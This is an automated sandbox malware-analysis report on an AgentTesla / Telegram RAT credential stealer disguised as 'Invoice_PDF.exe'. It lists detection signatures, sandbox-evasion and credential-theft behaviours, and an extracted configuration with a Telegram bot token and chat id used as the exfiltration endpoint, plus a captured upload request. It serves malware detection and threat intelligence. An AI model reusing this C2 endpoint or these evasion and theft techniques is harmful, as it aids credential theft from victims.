Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Invoice_PDF.exe

Overview

General Information

Sample Name:Invoice_PDF.exe
Analysis ID:532735
MD5:1dcc43f272f66d8e5afe11e7276dd122
SHA1:cb6a88d1443e7cca944a4176e2a8ebc205f715e3
SHA256:0c6a99b9327cbcb0f3c5b18bc93d347ec8adcb3686e562c515ee4388713e8ed7
Tags:agentteslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Invoice_PDF.exe (PID: 6140 cmdline: "C:\Users\user\Desktop\Invoice_PDF.exe" MD5: 1DCC43F272F66D8E5AFE11E7276DD122)
    • Invoice_PDF.exe (PID: 5944 cmdline: C:\Users\user\Desktop\Invoice_PDF.exe MD5: 1DCC43F272F66D8E5AFE11E7276DD122)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.0.Invoice_PDF.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              3.0.Invoice_PDF.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                3.2.Invoice_PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.2.Invoice_PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    3.0.Invoice_PDF.exe.400000.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}
                      Source: Invoice_PDF.exe.5944.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Invoice_PDF.exeVirustotal: Detection: 45%Perma Link
                      Source: Invoice_PDF.exeMetadefender: Detection: 48%Perma Link
                      Source: Invoice_PDF.exeReversingLabs: Detection: 62%
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: Invoice_PDF.exeAvira: detected
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Invoice_PDF.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Invoice_PDF.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.2.Invoice_PDF.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Invoice_PDF.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Invoice_PDF.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: Invoice_PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2
                      Source: Invoice_PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220872
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220040
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_0922032D
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092203F7
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220AEC
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092207F6
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220130
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092209B8
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092209CD
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220836
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_0922034A
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220B5E
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092203A0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220B86
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092203CF
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220BD2
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220A1E
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220AB8
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220A9D
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_0922051B
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092205B3
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220596
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092205D0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220C42
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092204AE
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220739
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_09220708
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_0922076F
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 4x nop then jmp 09220F57h0_2_092207C5

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6dHost: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: http://PHCGWf.com
                      Source: Invoice_PDF.exe, 00000003.00000002.527261346.00000000035B9000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: Invoice_PDF.exe, 00000003.00000002.529774678.0000000006EFE000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpString found in binary or memory: http://www.chinhdo.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comE8
                      Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                      Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.como
                      Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comoitu
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Invoice_PDF.exe, 00000003.00000002.527180057.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://87HMfkdDwCo1wEm.org
                      Source: Invoice_PDF.exe, 00000003.00000002.527027069.000000000354C000.00000004.00000001.sdmpString found in binary or memory: https://87HMfkdDwCo1wEm.orgx
                      Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/
                      Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentdocument-----
                      Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
                      Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6dHost: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: Invoice_PDF.exe
                      Source: initial sampleStatic PE information: Filename: Invoice_PDF.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b5029162Bu002d2D4Eu002d489Bu002d8212u002d1A5255E1EA59u007d/u0034695CF78u002d3B59u002d4037u002dB8EEu002dF86771E06890.csLarge array initialization: .cctor: array initializer size 12005
                      Source: Invoice_PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E2CBB40_2_02E2CBB4
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E2EFEA0_2_02E2EFEA
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E2EFF80_2_02E2EFF8
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_02E26F210_2_02E26F21
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_0914521B0_2_0914521B
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_091422600_2_09142260
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09146AB00_2_09146AB0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09146AC00_2_09146AC0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_09146D100_2_09146D10
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_092213800_2_09221380
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_013985603_2_01398560
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_013908183_2_01390818
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0139C0FC3_2_0139C0FC
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0139E5703_2_0139E570
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0139B0403_2_0139B040
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01392BD03_2_01392BD0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_013946983_2_01394698
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0176CDF03_2_0176CDF0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0176DDA03_2_0176DDA0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017688583_2_01768858
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_01764B783_2_01764B78
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0176A7603_2_0176A760
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017602973_2_01760297
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017655003_2_01765500
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_0176A0B83_2_0176A0B8
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E47A03_2_017E47A0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E3CCC3_2_017E3CCC
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E47503_2_017E4750
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E47303_2_017E4730
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E46F03_2_017E46F0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E46B03_2_017E46B0
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 3_2_017E54903_2_017E5490
                      Source: Invoice_PDF.exeBinary or memory string: OriginalFilename vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTransactionalFileManager.dllf# vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.282580770.0000000009150000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Invoice_PDF.exe
                      Source: Invoice_PDF.exeBinary or memory string: OriginalFilename vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000003.00000002.521181081.00000000012F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Invoice_PDF.exe
                      Source: Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
                      Source: Invoice_PDF.exeBinary or memory string: OriginalFilenameOverlappedDa.exeB vs Invoice_PDF.exe
                      Source: Invoice_PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Invoice_PDF.exeVirustotal: Detection: 45%
                      Source: Invoice_PDF.exeMetadefender: Detection: 48%
                      Source: Invoice_PDF.exeReversingLabs: Detection: 62%
                      Source: Invoice_PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Invoice_PDF.exe "C:\Users\user\Desktop\Invoice_PDF.exe"
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exe
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeProcess created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exeJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_PDF.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 3.0.Invoice_PDF.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Invoice_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Invoice_PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: Invoice_PDF.exe, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.2.Invoice_PDF.exe.b90000.0.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.0.Invoice_PDF.exe.b90000.0.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.2.Invoice_PDF.exe.ed0000.1.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.11.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.5.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.13.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.9.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.1.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.7.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_00B972C2 push esi; iretd 0_2_00B972C9
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeCode function: 0_2_00B95076 push bx; ret 0_2_00B9507D
